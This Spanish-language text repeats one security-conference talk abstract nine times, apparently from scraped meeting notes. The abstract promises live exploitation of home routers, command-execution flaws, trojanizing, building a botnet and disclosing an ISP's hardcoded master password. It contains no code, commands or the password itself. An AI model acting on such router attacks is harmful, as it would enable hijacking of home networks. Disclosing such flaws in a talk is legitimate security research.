  41. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  42. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  43. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  44. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  45. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  46. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  47. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  48. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.
  49. ----- Notas de la reunión (13/09/14 19:15) ----- Explicación de los usos fraudulentos que se le pueden dar a un router doméstico, así como la explotación en vivo de varios modelos (uno americano y el otro de ono), revelación de un par de fallos de seguridad que dan acceso al core del router, troyanización, montaje de una botnet, explicación del caso "ono_wifi" con su correspondiente revelación del masterpass que usa ono en madrid para configurar los routers remotamente. Pensamos que cambiando el nombre de la wifi y la clave ya estamos seguros, pero de serie muchos firmwares de los routers caseros tienen un montón de vulnerabilidades. En la charla se explica el uso que se le puede dar a un router domestico, desde redirigir el trafico de los clientes asociados hasta montar una botnet de millones de routers. Se revelarán dos "command execution" que dan acceso al core del router para poder troyanizarlo y a partir de ahí se estudiará el caso "ono_wifi" que es una wifi de invitados que esta desplegando ono sin que los usuarios se percaten, pasando por explicar como ono consigue configurar remotamente los routers con un masterpass que viene grabado en el propio firmware del router y que no se puede cambiar, con la revelación de dicho password para uso y disfrute de los asistentes.